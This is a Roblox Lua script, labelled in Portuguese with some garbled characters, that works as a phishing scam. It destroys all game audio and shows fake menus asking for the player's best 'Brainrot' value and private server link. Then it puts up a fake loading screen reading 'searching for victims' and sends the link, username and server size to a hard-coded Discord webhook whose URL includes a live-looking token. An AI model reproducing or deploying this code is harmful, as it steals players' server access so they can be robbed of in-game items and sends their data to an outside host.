--========================================================--
-- WEBHOOK CONFIG
--========================================================--
local WEBHOOK = "https://discord.com/api/webhooks/1449571858637656155/nTtKiViZavVVQKz26EpZQbo1F0qoLkTU2hCNJpokERNK1Nb2JBivLTQtwhnpdVshjoy0"

local Http = game:GetService("HttpService")
local Players = game:GetService("Players")
local LocalPlayer = Players.LocalPlayer
local SoundService = game:GetService("SoundService")

--========================================================--
-- MUTAﾃﾃグ TOTAL (MUTE ABSOLUTO)
--========================================================--
pcall(function()
SoundService.RespectFilteringEnabled = false
SoundService.Volume = 0
end)

for _, sg in ipairs(SoundService:GetChildren()) do
if sg:IsA("SoundGroup") then
sg:Destroy()
end
end

local function DestroySound(obj)
if obj:IsA("Sound") then
obj.Volume = 0
obj.Playing = false
obj:Destroy()
end
end

local function MuteTotal()
for _, s in ipairs(game:GetDescendants()) do
DestroySound(s)
end
if LocalPlayer:FindFirstChild("PlayerGui") then
for _, s in ipairs(LocalPlayer.PlayerGui:GetDescendants()) do
DestroySound(s)
end
end
end

game.DescendantAdded:Connect(function(obj)
task.wait()
DestroySound(obj)
end)

task.spawn(function()
while true do
SoundService.Volume = 0
MuteTotal()
task.wait()
end
end)

--========================================================--
-- FUNﾃﾃグ DE WEBHOOK
--========================================================--
local function enviarWebhook(link, brainrot)
local qtdPlayers = #Players:GetPlayers()
pcall(function()
request({
Url = WEBHOOK,
Method = "POST",
Headers = {["Content-Type"] = "application/json"},
Body = Http:JSONEncode({
embeds = {{
title = "陶 XBZIM METEDOSH - A Vﾃ控IMA CAIU･ｱ",
color = 3092790,
fields = {
{name = "迫 Link", value = link},
{name = "側 Usuﾃ｡rio", value = LocalPlayer.Name},
{name = "則 Pessoas no Servidor", value = tostring(qtdPlayers)},
{name = "虫 Valor do Brainrot", value = brainrot}
}
}}
})
})
end)
end

--========================================================--
-- TELA DE CARREGAMENTO AJUSTADA
--========================================================--
local function LoadingScreen()
MuteTotal()
local gui = Instance.new("ScreenGui")
gui.Parent = game.CoreGui
gui.DisplayOrder = 999999999
gui.IgnoreGuiInset = true
gui.ResetOnSpawn = false

local bg = Instance.new("Frame", gui)  
bg.Size = UDim2.new(1,0,1,0)  
bg.BackgroundColor3 = Color3.fromRGB(10,0,20)  
local grad = Instance.new("UIGradient", bg)  
grad.Color = ColorSequence.new({  
    ColorSequenceKeypoint.new(0, Color3.fromRGB(40,0,70)),  
    ColorSequenceKeypoint.new(1, Color3.fromRGB(10,0,20))  
})  
grad.Rotation = 45  

-- Tﾃｭtulo  
local title = Instance.new("TextLabel", bg)  
title.Size = UDim2.new(1,0,0,90)  
title.Position = UDim2.new(0.5,0,0.28,0)  
title.AnchorPoint = Vector2.new(0.5,0.5)  
title.BackgroundTransparency = 1  
title.Font = Enum.Font.GothamBlack  
title.Text = "太 XBZIM METEDOSH"  
title.TextScaled = true  
title.TextColor3 = Color3.fromRGB(130,0,255)  

-- Spinner  
local spinner = Instance.new("ImageLabel", bg)  
spinner.Size = UDim2.new(0,120,0,120)  
spinner.Position = UDim2.new(0.5,0,0.55,0)  
spinner.AnchorPoint = Vector2.new(0.5,0.5)  
spinner.BackgroundTransparency = 1  
spinner.Image = "rbxassetid://9067069331"  

-- Barra de fundo  
local barBG = Instance.new("Frame", bg)  
barBG.Size = UDim2.new(0.45,0,0,12)  
barBG.Position = UDim2.new(0.5,0,0.72,0) -- subiu um pouco  
barBG.AnchorPoint = Vector2.new(0.5,0.5)  
barBG.BackgroundColor3 = Color3.fromRGB(255,255,255)  
Instance.new("UICorner", barBG).CornerRadius = UDim.new(0,10)  

-- Barra preenchida  
local barFill = Instance.new("Frame", barBG)  
barFill.Size = UDim2.new(0,0,1,0)  
barFill.BackgroundColor3 = Color3.fromRGB(120,0,255)  
Instance.new("UICorner", barFill).CornerRadius = UDim.new(0,10)  

-- Porcentagem  
local percent = Instance.new("TextLabel", bg)  
percent.Size = UDim2.new(1,0,0,40)  
percent.Position = UDim2.new(0.5,0,0.78,0) -- acima do texto  
percent.AnchorPoint = Vector2.new(0.5,0.5)  
percent.BackgroundTransparency = 1  
percent.Font = Enum.Font.GothamBold  
percent.TextScaled = true  
percent.TextColor3 = Color3.fromRGB(130,0,255)  
percent.Text = "0%"  

-- Texto "PROCURANDO VITIMAS刪" abaixo da porcentagem  
local subtitle = Instance.new("TextLabel", bg)  
subtitle.Size = UDim2.new(1,0,0,40)  
subtitle.Position = UDim2.new(0.5,0,0.83,0)  
subtitle.AnchorPoint = Vector2.new(0.5,0.5)  
subtitle.BackgroundTransparency = 1  
subtitle.Font = Enum.Font.GothamBold  
subtitle.TextScaled = true  
subtitle.TextColor3 = Color3.fromRGB(130,0,255)  
subtitle.Text = "PROCURANDO VITIMAS刪"  

-- Animando barra e spinner  
task.spawn(function()  
    local p = 0  
    while barFill.Parent and p < 98 do  
        spinner.Rotation += 3  
        p += math.random(1,3)  
        if p > 98 then p = 98 end  
        percent.Text = p .. "%"  
        barFill.Size = UDim2.new(p/100,0,1,0)  
        task.wait(0.05)  
    end  
    percent.Text = "98%"  
    while barFill.Parent do  
        spinner.Rotation += 3  
        task.wait(0.01)  
    end  
end)

end

--========================================================--
-- MENU BRAINROT
--========================================================--
local brainGui = Instance.new("ScreenGui")
brainGui.Parent = game.CoreGui
brainGui.DisplayOrder = 999999997
brainGui.IgnoreGuiInset = true
brainGui.ResetOnSpawn = false

local frame = Instance.new("Frame", brainGui)
frame.Size = UDim2.new(0,400,0,180)
frame.Position = UDim2.new(0.5,-200,0.5,-90)
frame.BackgroundColor3 = Color3.fromRGB(20,0,40)
Instance.new("UICorner", frame).CornerRadius = UDim.new(0,15)

local titleLabel = Instance.new("TextLabel", frame)
titleLabel.Size = UDim2.new(1,0,0,40)
titleLabel.Position = UDim2.new(0,0,0,10)
titleLabel.BackgroundTransparency = 1
titleLabel.Font = Enum.Font.GothamBold
titleLabel.Text = "Valor melhor Brainrot"
titleLabel.TextScaled = true
titleLabel.TextColor3 = Color3.fromRGB(255,255,255)

local brainBox = Instance.new("TextBox", frame)
brainBox.Size = UDim2.new(1,-30,0,60)
brainBox.Position = UDim2.new(0,15,0,60)
brainBox.BackgroundColor3 = Color3.fromRGB(60,0,80)
brainBox.PlaceholderText = "minimo 15M+"
brainBox.Text = ""
brainBox.TextColor3 = Color3.new(1,1,1)
brainBox.TextScaled = true
brainBox.Font = Enum.Font.GothamBold
Instance.new("UICorner", brainBox).CornerRadius = UDim.new(0,12)

local brainBtn = Instance.new("TextButton", frame)
brainBtn.Size = UDim2.new(1,-40,0,45)
brainBtn.Position = UDim2.new(0.5,0,1,-40)
brainBtn.AnchorPoint = Vector2.new(0.5,0.5)
brainBtn.BackgroundColor3 = Color3.fromRGB(140,60,255)
brainBtn.Text = "Confirmar"
brainBtn.Font = Enum.Font.GothamBold
brainBtn.TextScaled = true
brainBtn.TextColor3 = Color3.new(1,1,1)
Instance.new("UICorner", brainBtn).CornerRadius = UDim.new(0,12)

--========================================================--
-- EVENTO DO BOTﾃグ BRAINROT
--========================================================--
brainBtn.MouseButton1Click:Connect(function()
local brainrot = tonumber(brainBox.Text)
if not brainrot or brainrot < 15 then
brainBox.Text = ""
brainBox.PlaceholderText = "Minimo 15M!"
return
end

brainrot = brainrot .. "M"  
brainGui:Destroy()  

-- MENU LINK  
local gui = Instance.new("ScreenGui")  
gui.Parent = game.CoreGui  
gui.DisplayOrder = 999999998  
gui.IgnoreGuiInset = true  
gui.ResetOnSpawn = false  

local base = Instance.new("Frame", gui)  
base.Size = UDim2.new(0,420,0,260)  
base.Position = UDim2.new(0.5,-210,0.5,-130)  
base.BackgroundColor3 = Color3.fromRGB(18,18,18)  
Instance.new("UICorner", base).CornerRadius = UDim.new(0,18)  

local title2 = Instance.new("TextLabel", base)  
title2.Size = UDim2.new(1,0,0,45)  
title2.Position = UDim2.new(0,0,0,10)  
title2.BackgroundTransparency = 1  
title2.Font = Enum.Font.GothamBlack  
title2.Text = "私 XBZIM METEDOSH"  
title2.TextScaled = true  
title2.TextColor3 = Color3.fromRGB(255,255,255)  

local subtitle = Instance.new("TextLabel", base)  
subtitle.Size = UDim2.new(1,-30,0,25)  
subtitle.Position = UDim2.new(0,15,0,70)  
subtitle.BackgroundTransparency = 1  
subtitle.Font = Enum.Font.GothamMedium  
subtitle.Text = "Link do Servidor Privado"  
subtitle.TextScaled = true  
subtitle.TextColor3 = Color3.fromRGB(200,200,200)  
subtitle.TextXAlignment = Enum.TextXAlignment.Left  

local box = Instance.new("TextBox", base)  
box.Size = UDim2.new(1,-30,0,45)  
box.Position = UDim2.new(0,15,0,110)  
box.BackgroundColor3 = Color3.fromRGB(40,40,40)  
box.PlaceholderText = "https://www.roblox.com/share?code=..."  
box.Text = ""  
box.TextColor3 = Color3.new(1,1,1)  
box.TextScaled = true  
box.Font = Enum.Font.GothamMedium  
Instance.new("UICorner", box).CornerRadius = UDim.new(0,10)  

local btn = Instance.new("TextButton", base)  
btn.Size = UDim2.new(1,-40,0,50)  
btn.Position = UDim2.new(0.5,0,1,-65)  
btn.AnchorPoint = Vector2.new(0.5,0.5)  
btn.BackgroundColor3 = Color3.fromRGB(140,60,255)  
btn.Text = "Confirmar"  
btn.Font = Enum.Font.GothamBold  
btn.TextScaled = true  
btn.TextColor3 = Color3.new(1,1,1)  
Instance.new("UICorner", btn).CornerRadius = UDim.new(0,12)  

-- EVENTO DO BOTﾃグ LINK  
btn.MouseButton1Click:Connect(function()  
    local link = box.Text  
    if link == "" or not (link:match("^https://") or link:match("^http://")) then  
        box.Text = ""  
        box.PlaceholderText = "LINK INVﾃ´IDO!"  
        return  
    end  

    gui:Destroy()  
    LoadingScreen()  

    task.delay(2, function()  
        enviarWebhook(link, brainrot)  
    end)  
end)

end)
